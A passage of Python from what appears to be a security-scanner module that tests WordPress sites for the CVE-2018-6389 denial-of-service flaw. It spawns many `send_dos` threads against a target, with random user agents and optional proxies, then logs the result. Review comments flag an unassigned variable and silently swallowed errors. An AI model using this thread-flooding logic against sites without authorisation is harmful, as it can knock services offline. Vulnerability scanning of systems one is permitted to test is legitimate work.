                user_agent = {'User-agent': random.choice(user_agent_list)}
            t = threading.Thread(target=send_dos,
                                 args=(url, user_agent, timeout_sec,
                                       log_in_file, language, time_sleep,
                                       thread_tmp_filename, retries,
                                       socks_proxy, scan_id, scan_cmd))
            threads.append(t)
            t.start()
            trying += 1
            if verbose_level > 3:
                # NOTE(review): `port` is not assigned anywhere in this
                # function. Unless a module-level `port` exists, this line
                # raises NameError whenever verbose_level > 3.
                info(
                    messages(language, "trying_message").format(
                        trying, total_req, num, total,
                        target_to_host(target), port,
                        'wordpress_dos_cve_2018_6389_vuln'))
            # Stop early once the marker file reads 0, but only when a limit
            # is in force. Any error while reading it is silently ignored,
            # and the file handle is never explicitly closed.
            try:
                if int(open(thread_tmp_filename).read().rsplit()[0]) == 0:
                    if limit != -1:
                        break
            except Exception:
                pass
            # Hold off spawning while the thread budget is used up.
            while 1:
                try:
                    if threading.activeCount() >= thread_number:
                        time.sleep(0.01)
                    else:
                        break
                except KeyboardInterrupt:
                    keyboard_interrupt_flag = True
                    break
            if keyboard_interrupt_flag:
                break
        # Wait for the workers, giving up after about timeout_sec seconds.
        # The loop exits at a count of 2 rather than 1 (presumably the main
        # thread plus the test() thread started above; confirm).
        kill_switch = 0
        kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                if threading.activeCount() == 2 or kill_switch == kill_time:
                    break
            except KeyboardInterrupt:
                break
        # A marker value of 1 is reported as "no vulnerability found".
        thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
        if thread_write == 1:
            info(
                messages(language, "no_vulnerability_found").format(
                    "wordpress_dos_cve_2018_6389_vuln"))
            if verbose_level != 0:
                data = json.dumps({
                    'HOST': target,
                    'USERNAME': '',
                    'PASSWORD': '',
                    'PORT': '',
                    'TYPE': 'wordpress_dos_cve_2018_6389_vuln',
                    'DESCRIPTION': messages(language,
                                            "no_vulnerability_found").format(
                        "wordpress_dos_cve_2018_6389_vuln"),
                    'TIME': now(),
                    'CATEGORY': "scan",
                    'SCAN_ID': scan_id,
                    'SCAN_CMD': scan_cmd
                })
                __log_into_file(log_in_file, 'a', data, language)
        os.remove(thread_tmp_filename)
    else:
        warn(
            messages(language, "input_target_error").format(
                'wordpress_dos_cve_2018_6389_vuln', target))